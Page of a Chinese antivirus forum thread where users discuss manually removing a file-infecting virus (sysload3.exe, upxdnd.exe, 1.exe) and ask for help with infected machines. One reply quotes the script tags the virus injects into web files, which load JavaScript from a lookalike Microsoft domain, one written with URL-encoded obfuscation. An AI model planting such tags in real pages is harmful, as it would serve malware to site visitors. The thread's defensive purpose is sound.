瑞星卡卡安全论坛技术交流区反病毒/反流氓软件论坛 【原创】sysload3.exe,upxdnd.exe,1.exe病毒手动清除方法

123456   2  /  6  页   跳转

【原创】sysload3.exe,upxdnd.exe,1.exe病毒手动清除方法

引用:
【newcenturymoon的贴子】启动记事本 是为了感染文件
………………

呵呵,启动记事本是为了使1.exe~7.exe释放病毒文件
gototop
 

不明白,记事本我看了下好像都很正常,没出现中毒的情况,弱弱地问下怎么感染,我是菜鸟莫怪
gototop
 

引用:
【枫笑九洲的贴子】
呵呵,启动记事本是为了使1.exe~7.exe释放病毒文件
………………

能否说的详细点
gototop
 

大侠们救命啊
我机器好象就被感染了!
正迷惑中?
有能1V1帮我解决的吗?

PS:冰刃哪里有下?

还有,我按楼主的方法清除完,但我还有被感染的程序是不是还会反复中啊?
gototop
 

引用:
【kk痞子李的贴子】大侠们救命啊
我机器好象就被感染了!
正迷惑中?
有能1V1帮我解决的吗?

PS:冰刃哪里有下?

还有,我按楼主的方法清除完,但我还有被感染的程序是不是还会反复中啊?
………………

如果真和7楼说的一样,估计还会中
gototop
 

中了它就全格吧。

别的没法想。

现在的文件备份太重要了。
gototop
 

引用:
【emptyzero的贴子】
能否说的详细点
………………

6、启NOTEPAD进程,便利本地磁盘,感染大小在10K---10M之间的.exe文件,感染后图标不变,使病毒难以被察觉。
7、感染HTML .ASPX .HTM .PHP .JSP .ASP和 .EXE文件,并向.HTML .ASPX .HTM .PHP .JSP .ASP文件里植入以下代码:
<script src=http://macr.microfsot.com/<removed>.js></script>
或者
<script language="javascript" src="http://%6D%61%63%72%2E%6D%69%63%72%6F%66%73%6F%74%2E%63%6F%6D/<removed>.js"></script>
gototop
 

我目前已经发现我运行UTALK时会出现
别的还不知道~ 我该怎么办啊?
gototop
 

他感染 exe文件导致 用杀毒软件 如瑞星全盘杀毒 尽量不要用国外软件 (卡巴)等 他们会直接干掉文件 而不是清除病毒
gototop
 

试了一下最新的瑞星 19.16.60,还是杀不掉 因为我压缩了个染毒的文件邮给了版主,那个压缩包,瑞星并没有查出病毒来。


我还有个奇怪的现象
按楼顶的方法实施后,按理说至少在内存中没毒了,只要是不运行其它盘里的EXE文件,应该是安全的,可是机器运行一会后,瑞星监控的图标虽然在,可是双击再也出不来杀毒界面了。
gototop
 
123456   2  /  6  页   跳转
页面顶部
Powered by Discuz!NT